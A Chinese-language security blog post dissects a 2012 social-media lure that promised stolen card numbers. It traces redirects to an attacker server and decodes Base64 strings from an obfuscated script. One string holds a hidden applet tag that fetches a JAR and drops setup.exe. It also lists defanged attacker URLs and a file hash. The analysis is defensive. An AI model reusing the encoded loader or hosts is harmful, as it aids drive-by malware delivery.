我收到了一封钓鱼邮件，并点击了它 | 网络罪恶与安全

网络罪恶与安全 - Rishi Narang的博客

菜单 首页 归档 关于我 免责声明

我收到了一封钓鱼邮件，并点击了它

2012年4月18日 / 黑客技术

我们在社交网站上遇到很多链接，会无意中点击许多。恶意链接具有灾难性后果，系统及隐私可能被泄露，或数据遭受损失。以下是对2012年4月17日通过Twitter和LinkedIn遇到的一个链接的分析。

注意：所有链接已附加“不可点击”后缀hxxp://，以防止误点击。

有人在推文中发布了这个链接（hxxp://pastebin.com/dRGHt7hy）。检查后发现是一个URL列表（实际上是同一个URL多次粘贴——绝望的迹象）： hxxp://tinyurl.com/saw87hujnworeg hxxp://tinyurl.com/saw87hujnworeg hxxp://tinyurl.com/saw87hujnworeg hxxp://tinyurl.com/saw87hujnworeg

它声称这个链接包含9954个信用卡号。第一个恶意提示是：为什么不直接发布，而是在一个条目中粘贴同一个链接4次。

其次，这是一个过于诱人的目标；所以要小心行事。因此，我在Malzilla（http://malzilla.sourceforge.net/）中打开了链接，这是一个恶意软件狩猎工具。我禁用了自动重定向。链接hxxp://tinyurl.com/saw87hujnworeg重定向到hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b，该链接以文本字段和脚本形式打开。文件只包含一个“可疑”脚本，带有一些标题。

以下是页面中包含的唯一重要脚本。让我们进行分析。

由于变量名过长，这个脚本难以理解，因此首先将变量名改为较短版本以便更好理解。以下是修改后的脚本，使用短变量名，不改变其逻辑和工作方式。

现在，很容易理解脚本的逻辑和工作方式。首先，让我们解码setTimeout和document.write字段。它们看起来像Base64编码，因此尝试解码它们。编码字符串如下：

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yMTIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTUxMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9IkxlZ3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2FwcGxldD4=

解码后的字符串如下：

1. Adobe Flash must be updated to view this, please install the latest version!
2. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b

第一个解码字符串用于诱使受害者通过恶意链接点击安装“最新版本”的Flash。因此，我们可以看到它将再次向以下链接发出GET请求： hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

参数如下： name=“wcZPN” value=“hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b” name=“v8TOX” value=“setup.exe” name=“Legym” value=“www.dogscast.com” name=“MpBDG” value=“APPDATA”

让我们访问这些URL。

首先，我通过Malzilla访问了adobe.php URL（hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b），它在我的系统上下载了一个文件“Adobe-Flash_WIN.exe”。该文件大小约为1.16 Mb。在VirusTotal扫描时，该文件的捕获率为2/42反恶意软件产品。这很可怕。我没有机会对这个文件进行运行时分析，但会在下一篇博客中发布。

访问第二个URL（hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar）时，它下载了一个JAR文件“0b740ebcc2abbc5512c4875a0f74965b.jar”。解压该文件后得到“META-INF”目录和“SiteLoader.class”文件。META-INF的内容包括： JUBUHUSE.DSA JUBUHUSE.SF MANIFEST.MF

现在，让我们通过Malzilla分析第三个URL load.php（hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b）。访问时，该链接在主机上下载了一个“setup.exe”文件。根据SHA256哈希cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5，该文件与之前的文件相同。

这是对钓鱼链接的简要分析，该链接通过Twitter作为PASTEBIN链接开始，并通过各种文件到达您的系统。

封面图片：由Wynand van Poortvliet在Unsplash上拍摄

钓鱼 社会工程 垃圾邮件 归档

« 上一篇 在渗透测试中你应该寻找什么？ 下一篇 » 鱼叉式网络钓鱼，PayTM的一个问题

© 2025 网络罪恶。 向Astrid致谢支持。感谢Vimux提供Mainroad基础主题和Turtle Media提供徽标。用💛和Hugo制作。